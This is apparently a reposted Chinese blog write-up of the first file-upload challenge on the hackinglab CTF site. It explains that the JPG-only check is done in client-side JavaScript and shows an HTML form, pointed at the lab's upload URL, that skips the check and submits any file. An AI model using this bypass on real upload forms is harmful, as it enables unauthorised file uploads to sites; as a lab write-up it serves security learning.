hackinglab上传关第一题

发布时间：2023-09-06 01:48责任编辑：彭小芳关键词：hack

请上传一张jpg格式的图片分值: 100

只能上传jpg格式的图片哦~！
通关地址

看源码，js做的文件后缀验证，极端不安全。由于我没有开brupsuit，所以将源代码复制到本地，新建一个html，内容如下：

<html><head><meta http-equiv=Content-Type content="text/html;charset=utf-8"><title>upload 1</title></head><body>请上传一张JPG格式的图片！<form action="http://lab1.xseclab.com/upload1_a4daf6890f1166fd88f386f098b182af/upload_file.php" method="post" enctype="multipart/form-data"><label for="file">文件名</label><input type="file" name="file" id="file" /> <br /><input type="submit" name="submit" value="上传" /></form></body></html><!--在form的action那里需要将url改为绝对路径，否则会失败-->

去掉js检查，浏览器打开这个html提交，get flag success :)

hackinglab上传关第一题

原文地址：https://www.cnblogs.com/Kog-Maw/p/8733978.html

hackinglab上传关第一题

知识推荐